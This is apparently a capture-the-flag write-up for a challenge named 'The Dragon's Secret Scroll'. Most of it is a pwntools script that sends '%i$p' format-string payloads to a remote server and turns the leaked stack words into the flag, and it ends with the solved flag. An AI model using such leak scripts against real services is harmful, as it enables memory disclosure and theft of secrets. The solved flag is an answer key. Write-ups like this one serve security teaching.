The Dragon's Secret Scroll

Challenge Description :

we are not given any file so we can think of format string vulenrability

let's build a python script that will fuzz the binary and try to extract the flag

Exploit :

from pwn import *

flag = ''

# Let's fuzz x values
for i in range(100):
    try:
        # Connect to server
        io = remote('173.255.201.51', 51337)
        # Format the counter
        # e.g. %i$p will attempt to print [i]th pointer (or string/hex/char/int)
        io.sendline('%{}$p'.format(i).encode())
        # Receive the response (leaked address followed by '.' in this case)
        io.recvuntil(b'give you.. ')
        result = io.recv()
        if not b'nil' in result:
            print(str(i) + ': ' + str(result))
            try:
                # Decode, reverse endianess and print
                decoded = unhex(result.strip().decode()[2:])
                reversed_hex = decoded[::-1]
                print(str(reversed_hex))
                # Build up flag
                flag += reversed_hex.decode()
            except BaseException:
                pass
    except EOFError:
        pass

# Print and close
info(flag)
io.close()

let's run the fuzzer

Flag :

KCTF{DRAGONsCrOll}